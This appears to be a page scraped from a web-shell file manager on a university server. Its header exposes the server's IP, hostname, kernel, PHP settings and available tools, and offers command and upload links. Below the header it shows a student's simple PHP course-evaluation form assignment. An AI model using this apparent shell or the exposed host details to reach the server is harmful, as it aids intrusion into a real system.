Server IP : 172.16.15.8 / Your IP : 3.131.13.24 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/jesimmons/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- File name: Ass2-3radio.php Assigment 2-3 Due: Feb. 27, 2020 Author: Jackson S. Goal: 3.This is a simple course evaluation system. The first page is a form that includes two text boxes for the student's name and the course number (such as CS 212, CS 480, MAT 171 etc). The second page lists two made-up questions for evaluating the course and three radio buttons showing the values of 'strong agree', 'agree', and 'not agree'. The third page displays all the information passed down from the last two pages, including student's name, course number, and results for the two questions. Another option for the course number is to use the selection list that is not required. --> <CENTER> <H2> Course Evaluation <?php session_start(); $firstName = $_POST['first']; $course = $_POST['c']; $_SESSION['v1'] = $firstName; $_SESSION['v2'] = $course; ?> </H2> <HR> <FORM action=Ass2-3Result.php method=post> 1. I am Enjoying this course. <INPUT type=radio name=q1 value=one checked> Strong Agree <INPUT type=radio name=q1 value=two> Agree <INPUT type=radio name=q1 value=three> Do not Agree <P> 2. I am Benefitting from the knowledge I am receiving from this course. <INPUT type=radio name=q2 value=one2 checked> Strong Agree <INPUT type=radio name=q2 value=two2> Agree <INPUT type=radio name=q2 value=three2> Do not Agree <P> <INPUT type=submit value="Submit Form"> <INPUT type=reset value="Reset Form"> </FORM> </CENTER>